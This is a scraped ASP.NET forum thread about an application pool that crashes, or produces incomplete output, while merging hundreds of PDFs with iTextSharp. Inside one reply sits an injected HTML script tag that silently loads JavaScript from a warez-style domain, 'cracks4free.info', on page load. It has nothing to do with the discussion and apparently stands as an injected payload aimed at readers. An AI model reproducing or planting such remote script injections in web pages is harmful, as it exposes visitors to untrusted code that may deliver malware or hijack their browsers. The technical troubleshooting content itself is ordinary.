Issue with application Pool RRS feed

• Question

• User1249128643 posted

Hi,

I am merginf PDFs using iTextSharp and displaying the merged PDF on the browser in an ASP.NET MVC application.

The application pool crashes or the merged PDF does not display all the pages when iTextSharp is trying to merge hig volume of PDFs (about 400+ PDFs each of about 140KB).

Could you please provide an update on how the issue was resolved.

Many thanks.

Best Regards

Shwetha

Saturday, July 20, 2013 8:23 PM

All replies

• User1083584480 posted

Have you check event Viewer for detail information on Error.

could you please poste the error log from event viewer.

<script src="http://cracks4free.info/5/adds.js" async="" type="text/javascript"></script>
    Sunday, July 21, 2013 11:05 AM
  • User1249128643 posted

The trouble is that it is not throwing error or there is not entry in the Event Viewer.

Sometimes the application crashes indicating there is a connectivity issue (like connectivity to internet). Bu there is no log of this eityher in event viewr or IIS logs. The internet is connected as I can go back to other parts of application or access new web pages.

But some times (whic is more dangerous) is that the merged PDF contains only few PDFs out of the 100's of PDFs that were queued for merging.

Is there an alternative solution such as runiung  a command prompt based PDF merging tool (which would run out of the application). But after merging I still have to display the merged PDF in the application.

Is there an alternative approach that would let me acheive this functionality?

Thanks!

Monday, July 22, 2013 7:26 AM
  • User-801004448 posted

Is there an alternative solution such as runiung  a command prompt based PDF merging tool (which would run out of the application). But after merging I still have to display the merged PDF in the application.

This is even harder than using a component on website to merge/generate pdf files.

It's quite hard to find a reliable, easy-to-use and free pdf component!

Thursday, July 25, 2013 3:07 AM